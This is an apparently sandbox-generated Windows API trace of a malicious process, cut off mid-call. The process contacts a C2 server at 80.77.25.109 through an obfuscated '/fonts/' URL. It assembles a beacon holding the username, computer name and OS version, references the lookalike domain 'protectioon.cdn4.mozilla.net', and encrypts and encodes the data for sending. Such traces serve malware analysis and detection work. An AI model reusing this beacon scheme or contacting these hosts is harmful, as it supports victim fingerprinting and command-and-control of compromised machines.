342 [0099.412] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2ad) returned 0x2c5b7f8 [0099.412] InternetCanonicalizeUrlA (lpszUrl="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak", lpszBuffer=0x2c5b7f8, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0099.412] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak", lpszBuffer=0x2c5b7f8, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak", lpdwBufferLength=0x11ff040) returned 1 [0099.413] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b688 | out: hHeap=0x2860000) returned 1 [0099.413] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0099.414] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0099.414] ResetEvent (hEvent=0x1c8) returned 1 [0099.414] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.25.109", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0099.414] SetEvent (hEvent=0x1c8) returned 1 [0099.414] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/EPT9utPC1ladvBEuonHxwK/lNcjSGbwWslTS/cLE1URuF/SvZrRnzfI4cVD6EZGIwOD7h/w_2Fh6Rfkj/aCc1q17nn_2FetFWv/rLVIoi6Kckr3/gnwtD4ftDYK/5fmSBM1hlhUvTp/_2BXcktm8N7lKGQokmn1v/P26VSJAABlGhG6D7/SDOaYdHMEsQ7zM0/59e214xLxzu_2B4t6C/adtn6wJZB/ueE9CH3hWw0fIxnVXcg_/2FK3HoSIvPyqCV67J_2/F2DIbEZPX0guDzr6dMqlh5/TFCQuEuGljiH3/8lcLV2o7/8PzQAmuDCT9arsq/Maetc.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0099.415] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0099.415] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0099.415] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0099.415] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0099.415] ResetEvent (hEvent=0x1c8) returned 1 [0099.415] ResetEvent (hEvent=0x1c4) returned 1 [0099.415] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0099.415] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0099.415] GetLastError () returned 0x3e5 [0099.415] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x102 [0099.415] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0099.415] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0099.592] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x0 [0099.593] SetEvent (hEvent=0x1c8) returned 1 [0099.593] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0099.593] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0099.593] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c5b688 [0099.593] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c5b688, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c5b688*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0099.593] ResetEvent (hEvent=0x1c8) returned 1 [0099.593] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0099.593] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0099.593] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x7ba288) returned 0x0 [0099.594] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2c5bab0 [0099.594] ISequentialStream:RemoteWrite (in: This=0x7ba288, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0099.594] ResetEvent (hEvent=0x1c8) returned 1 [0099.594] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c5bab0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2c5bab0*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0099.595] ISequentialStream:RemoteWrite (in: This=0x7ba288, pv=0x2c5bab0*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0099.595] ResetEvent (hEvent=0x1c8) returned 1 [0099.595] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c5bab0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2c5bab0*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0099.596] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5bab0 | out: hHeap=0x2860000) returned 1 [0099.596] IStream:Stat (This=0x7ba288, pstatstg=0x11fefe0, grfStatFlag=0x1) [0099.596] IStream:Stat (in: This=0x7ba288, pstatstg=0x11fefe0, grfStatFlag=0x1 | out: pstatstg=0x11fefe0) returned 0x0 [0099.596] IStream:RemoteSeek (in: This=0x7ba288, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0099.596] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2c5bab0 [0099.596] ISequentialStream:RemoteRead (in: This=0x7ba288, pv=0x2c5bab0, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2c5bab0*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0099.596] IUnknown:Release (This=0x7ba288) returned 0x0 [0099.596] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0099.596] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0099.596] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0099.596] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0099.597] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0099.597] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0099.597] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0099.597] CloseHandle (hObject=0x1c8) returned 1 [0099.597] CloseHandle (hObject=0x1c4) returned 1 [0099.598] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5bab0 | out: hHeap=0x2860000) returned 1 [0099.598] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b688 | out: hHeap=0x2860000) returned 1 [0099.599] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c88 | out: hHeap=0x2860000) returned 1 [0099.599] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b7f8 | out: hHeap=0x2860000) returned 1 [0099.600] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0099.600] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0099.601] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ad18 | out: hHeap=0x2860000) returned 1 [0099.601] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0099.601] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0099.601] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0099.601] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0109.624] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0109.624] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0109.625] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0109.625] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0109.625] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0109.625] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2791496409750) returned 1 [0109.625] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=27914") returned 13 [0109.625] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0109.625] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0109.626] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0109.626] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0109.627] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c59a68 [0109.627] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c59a68, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0109.628] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0109.628] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0109.628] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0109.628] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0109.630] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0109.630] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0109.630] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0109.631] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0109.632] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0109.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHBEuonHxwK/lNcjSGbwWslTS/cLk", lpUsedDefaultChar=0x0) returned 20 [0109.632] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0109.633] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0109.633] lstrlenA (lpString="protectioon.cdn4.mozilla.net") [0109.633] lstrlenA (lpString="protectioon.cdn4.mozilla.net") returned 28 [0109.633] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1d) returned 0x2c59a68 [0109.633] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e7f, _Size=0x1c | out: _Dst=0x2c59a68) returned 0x2c59a68 [0109.633] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0109.633] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5ea38 [0109.633] GetTickCount () returned 0x1a6fbec [0109.633] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xa) returned 0x2c59b28 [0109.633] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59b40 [0109.633] lstrlenA (lpString="%s=%s&") returned 6 [0109.633] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x14) returned 0x2c59b50 [0109.633] sprintf (in: _Dest=0x2c59b50, _Format="%s=%s&" | out: _Dest="duqg=gwykwueej&") returned 15 [0109.633] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b40 | out: hHeap=0x2860000) returned 1 [0109.633] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0109.633] lstrlenA (lpString="duqg=gwykwueej&") returned 15 [0109.633] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27914&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0109.633] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd5) returned 0x2c59b70 [0109.634] strcpy (_Dest=0x2c59b70, _Source="duqg=gwykwueej&") [0109.634] strcpy (in: _Dest=0x2c59b70, _Source="duqg=gwykwueej&" | out: _Dest="duqg=gwykwueej&") returned="duqg=gwykwueej&" [0109.634] lstrcatA (lpString1="duqg=gwykwueej&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27914&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0109.634] lstrcatA (in: lpString1="duqg=gwykwueej&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27914&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="duqg=gwykwueej&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27914&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="duqg=gwykwueej&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27914&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0109.634] lstrlenA (lpString="duqg=gwykwueej&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27914&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 212 [0109.634] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0109.634] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0109.635] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0109.635] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0109.635] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d378) returned 1 [0109.635] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0109.635] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0109.635] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c50 [0109.636] memcpy (in: _Dst=0x2c59c50, _Src=0x2c59b70, _Size=0x10 | out: _Dst=0x2c59c50) returned 0x2c59c50 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59c60, _Src=0x2c59b80, _Size=0x10 | out: _Dst=0x2c59c60) returned 0x2c59c60 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59c70, _Src=0x2c59b90, _Size=0x10 | out: _Dst=0x2c59c70) returned 0x2c59c70 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59c80, _Src=0x2c59ba0, _Size=0x10 | out: _Dst=0x2c59c80) returned 0x2c59c80 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59c90, _Src=0x2c59bb0, _Size=0x10 | out: _Dst=0x2c59c90) returned 0x2c59c90 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59ca0, _Src=0x2c59bc0, _Size=0x10 | out: _Dst=0x2c59ca0) returned 0x2c59ca0 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59cb0, _Src=0x2c59bd0, _Size=0x10 | out: _Dst=0x2c59cb0) returned 0x2c59cb0 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59cc0, _Src=0x2c59be0, _Size=0x10 | out: _Dst=0x2c59cc0) returned 0x2c59cc0 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59cd0, _Src=0x2c59bf0, _Size=0x10 | out: _Dst=0x2c59cd0) returned 0x2c59cd0 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59ce0, _Src=0x2c59c00, _Size=0x10 | out: _Dst=0x2c59ce0) returned 0x2c59ce0 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59cf0, _Src=0x2c59c10, _Size=0x10 | out: _Dst=0x2c59cf0) returned 0x2c59cf0 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59d00, _Src=0x2c59c20, _Size=0x10 | out: _Dst=0x2c59d00) returned 0x2c59d00 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59d10, _Src=0x2c59c30, _Size=0x10 | out: _Dst=0x2c59d10) returned 0x2c59d10 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] memcpy (in: _Dst=0x2c59d20, _Src=0x2c59c40, _Size=0x5 | out: _Dst=0x2c59d20) returned 0x2c59d20 [0109.636] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d20*, pdwDataLen=0x11ff074*=0x5, dwBufLen=0x20 | out: pbData=0x2c59d20*, pdwDataLen=0x11ff074*=0x10) returned 1 [0109.636] CryptDestroyKey (hKey=0x77d378) returned 1 [0109.636] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0109.636] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0109.636] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5f240 [0109.637] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c50 | out: hHeap=0x2860000) returned 1 [0109.638] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b70 | out: hHeap=0x2860000) returned 1 [0109.638] StrTrimA (psz="isRVJBv0mXSMa2Ji/GT82FMxGoymkAZ3E+Nb5YriH7PZEE1cawWrKjEwg8xdPtbXs4/isFBMWyUFwIw4TSL6aC4rkUqj2cSesZvz7Zk8JZpOBsbnVXktKujVY57Jwo2zFLEz0ADjp6tLESG3wbJ7TLcLYVnvGgiImSsskey7jIDd/3aorVdm869DfYuCXx9PEf74q9Grv2cO3R0JbpB39D78cO3Nw032fpABBDDcRw2d50UkpmbTrlDBV3w8iuVmDFfdg9FpqHt2l7yiqYCtC5Sqnim+8JDZcDyHJ67Ef+z=", pszTrimChars="\r\n=") [0109.638] StrTrimA (in: psz="isRVJBv0mXSMa2Ji/GT82FMxGoymkAZ3E+Nb5YriH7PZEE1cawWrKjEwg8xdPtbXs4/isFBMWyUFwIw4TSL6aC4rkUqj2cSesZvz7Zk8JZpOBsbnVXktKujVY57Jwo2zFLEz0ADjp6tLESG3wbJ7TLcLYVnvGgiImSsskey7jIDd/3aorVdm869DfYuCXx9PEf74q9Grv2cO3R0JbpB39D78cO3Nw032fpABBDDcRw2d50UkpmbTrlDBV3w8iuVmDFfdg9FpqHt2l7yiqYCtC5Sqnim+8JDZcDyHJ67Ef+z=", pszTrimChars="\r\n=" | out: psz="isRVJBv0mXSMa2Ji/GT82FMxGoymkAZ3E+Nb5YriH7PZEE1cawWrKjEwg8xdPtbXs4/isFBMWyUFwIw4TSL6aC4rkUqj2cSesZvz7Zk8JZpOBsbnVXktKujVY57Jwo2zFLEz0ADjp6tLESG3wbJ7TLcLYVnvGgiImSsskey7jIDd/3aorVdm869DfYuCXx9PEf74q9Grv2cO3R0JbpB39D78cO3Nw032fpABBDDcRw2d50UkpmbTrlDBV3w8iuVmDFfdg9FpqHt2l7yiqYCtC5Sqnim+8JDZcDyHJ67Ef+z") returned 1 [0109.638] lstrlenA (lpString="isRVJBv0mXSMa2Ji/GT82FMxGoymkAZ3E+Nb5YriH7PZEE1cawWrKjEwg8xdPtbXs4/isFBMWyUFwIw4TSL6aC4rkUqj2cSesZvz7Zk8JZpOBsbnVXktKujVY57Jwo2zFLEz0ADjp6tLESG3wbJ7TLcLYVnvGgiImSsskey7jIDd/3aorVdm869DfYuCXx9PEf74q9Grv2cO3R0JbpB39D78cO3Nw032fpABBDDcRw2d50UkpmbTrlDBV3w8iuVmDFfdg9FpqHt2l7yiqYCtC5Sqnim+8JDZcDyHJ67Ef+z") returned 299 [0109.638] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5f408 [0109.638] _snprintf (in: _Dest=0x2c5f418, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0109.638] _snprintf (in: 